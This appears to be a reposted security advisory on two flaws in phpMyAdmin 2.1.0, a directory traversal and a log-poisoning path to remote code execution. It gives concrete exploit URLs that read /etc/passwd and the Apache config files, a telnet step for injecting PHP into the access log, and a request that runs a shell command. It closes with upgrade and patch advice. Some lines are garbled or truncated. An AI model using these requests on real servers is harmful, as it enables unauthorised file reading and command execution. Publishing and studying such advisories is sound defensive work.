phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) is a PHP tool for managing MySQL databases, with a WEB-based interface. But it was found to have loopholes. Optionally install the newly released stable version:
phpMyAdmin 2.2.0.
1. Directory traversal vulnerability
The attacker provides the following URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
Can illegally access system files
The problematic code is:
'include ($goto);' in sql.php and in tbl_replace.php.
2. Attacker code execution vulnerability
By using globally writable log files, an attacker can execute arbitrary code on the affected server.
First, get the Apache configuration file so you know where the log files are stored:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php ?goto=/etc/apache/conf/access.conf&btnDrop=No
As you can see, the log is placed at:
/var/log/httpd/error_log
/var/log/httpd/access_log
Then telnet to port 80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^ ]'.
GET
^]
telnet> quit
Connection closed.
#
After the GET request, the attacker can upload arbitrary PHP code
Now, you can Run the command remotely as Apache user:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20- l%20/
Affected systems:
phpMyAdmin 2.1.0
Solution:
Suggestions:
1. Use phpMyAdmin 2.2.0
http://prdownloads.sourceforge. net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2. Users download and install the patch:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
Excerpted from: 52w.net